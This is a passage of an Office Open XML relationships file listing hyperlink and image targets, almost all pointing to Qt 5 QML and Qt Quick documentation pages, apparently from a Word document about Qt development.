Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtplugin.html" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/supported-platforms.html" TargetMode="External"/><Relationship Id="rId742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-audiolistener.html" TargetMode="External"/><Relationship Id="rId1165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-picture.html" TargetMode="External"/><Relationship Id="rId1372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-textureimage.html" TargetMode="External"/><Relationship Id="rId2009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg" TargetMode="External"/><Relationship Id="rId2216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-innershadow.html" TargetMode="External"/><Relationship Id="rId1025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-keyboardlayout.html" TargetMode="External"/><Relationship Id="rId1232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-renderpass.html" TargetMode="External"/><Relationship Id="rId1677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-targetdirection.html" TargetMode="External"/><Relationship Id="rId2728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-var.html" TargetMode="External"/><Relationship Id="rId2935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-editorialmodel.html" TargetMode="External"/><Relationship Id="rId1537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId1604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-exposecppattributes.html" TargetMode="External"/><Relationship Id="rId1811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId1909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-documents-networktransparency.html" TargetMode="External"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-abstractbarseries.html" TargetMode="External"/><Relationship Id="rId2073" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textedit.html" TargetMode="External"/><Relationship Id="rId2378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-flow-text1.png" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId1187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-polarchartview.html" TargetMode="External"/><Relationship Id="rId2140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId2585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qguiapplication.html" TargetMode="External"/><Relationship Id="rId764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-bool.html" TargetMode="External"/><Relationship Id="rId971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-gyroscope.html" TargetMode="External"/><Relationship Id="rId1394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-torusgeometry.html" TargetMode="External"/><Relationship Id="rId1699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-simplematerial-example.html" TargetMode="External"/><Relationship Id="rId2238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keys.html" TargetMode="External"/><Relationship Id="rId2445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlexampletoggleswitch.html" TargetMode="External"/><Relationship Id="rId2652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsqltablemodel.html" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId1047" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-lineargradient.html" TargetMode="External"/><Relationship Id="rId1254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-scale.html" TargetMode="External"/><Relationship Id="rId1461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webengineview.html" TargetMode="External"/><Relationship Id="rId2305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-behaviors.html" TargetMode="External"/><Relationship Id="rId2957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flow.html" TargetMode="External"/><Relationship Id="rId1114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-core-node.html" TargetMode="External"/><Relationship Id="rId1321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-statemachine.html" TargetMode="External"/><Relationship Id="rId1559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId1419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-valueaxis.html" TargetMode="External"/><Relationship Id="rId1626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId1900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2095" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visualize-original.png" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/whatsnew50.html" TargetMode="External"/><Relationship Id="rId2162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId3006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-debugging.html" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-matrix4x4.html" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-cameracapture.html" TargetMode="External"/><Relationship Id="rId993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-innershadow.html" TargetMode="External"/><Relationship Id="rId2467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId2674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathview.html" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId1069" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-mappolyline.html" TargetMode="External"/><Relationship Id="rId1276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId1483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId2022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId2327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/margins_qml.png" TargetMode="External"/><Relationship Id="rId2881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webengineview.html" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaproperty.html" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-text.png" TargetMode="External"/><Relationship Id="rId853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-contactdetail.html" TargetMode="External"/><Relationship Id="rId1136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parallelanimation.html" TargetMode="External"/><Relationship Id="rId1690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId1995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerial.html" TargetMode="External"/><Relationship Id="rId2534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-list.html" TargetMode="External"/><Relationship Id="rId2839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgimagenode.html" TargetMode="External"/><Relationship Id="rId713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-age.html" TargetMode="External"/><Relationship Id="rId920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId1343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-switchdelegate.html" TargetMode="External"/><Relationship Id="rId1550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtime.html" TargetMode="External"/><Relationship Id="rId1648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstringlist.html" TargetMode="External"/><Relationship Id="rId1203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-proximitysensor.html" TargetMode="External"/><Relationship Id="rId1410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-treeviewstyle.html" TargetMode="External"/><Relationship Id="rId1508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId1855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId2906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId1715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-imports.html" TargetMode="External"/><Relationship Id="rId2184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId3028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-debug-mode.html" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/deployment.html" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-examples.html" TargetMode="External"/><Relationship Id="rId2044" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph-renderer.html" TargetMode="External"/><Relationship Id="rId2251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/declarative-qmlfocus3.png" TargetMode="External"/><Relationship Id="rId2489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parallelanimation.html" TargetMode="External"/><Relationship Id="rId2696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-performance.html" TargetMode="External"/><Relationship Id="rId875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-calendar-dayofweekrow.html" TargetMode="External"/><Relationship Id="rId1060" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-logvalueaxis3dformatter.html" TargetMode="External"/><Relationship Id="rId1298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-spheregeometry.html" TargetMode="External"/><Relationship Id="rId2111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations-software.html" TargetMode="External"/><Relationship Id="rId2349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId2763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrolsstyles-index.html" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-overview.html" TargetMode="External"/><Relationship Id="rId735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-attenuationmodelinverse.html" TargetMode="External"/><Relationship Id="rId942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-framegraphnode.html" TargetMode="External"/><Relationship Id="rId1158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-percentbarseries.html" TargetMode="External"/><Relationship Id="rId1365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-textareastyle.html" TargetMode="External"/><Relationship Id="rId1572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlapplications.html" TargetMode="External"/><Relationship Id="rId2209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId2623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId1018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-jumplistdestination.html" TargetMode="External"/><Relationship Id="rId1225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-videooutput.html" TargetMode="External"/><Relationship Id="rId1877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId2830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgclipnode.html" TargetMode="External"/><Relationship Id="rId2928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dframebuffer.html" TargetMode="External"/><Relationship Id="rId1737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtdatavisualization-qmlbars-example.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcontext.html" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-colorize.html" TargetMode="External"/><Relationship Id="rId2066" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-focus.html" TargetMode="External"/><Relationship Id="rId2480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-state.html" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-distancesensor.html" TargetMode="External"/><Relationship Id="rId1082" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-menu.html" TargetMode="External"/><Relationship Id="rId2133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 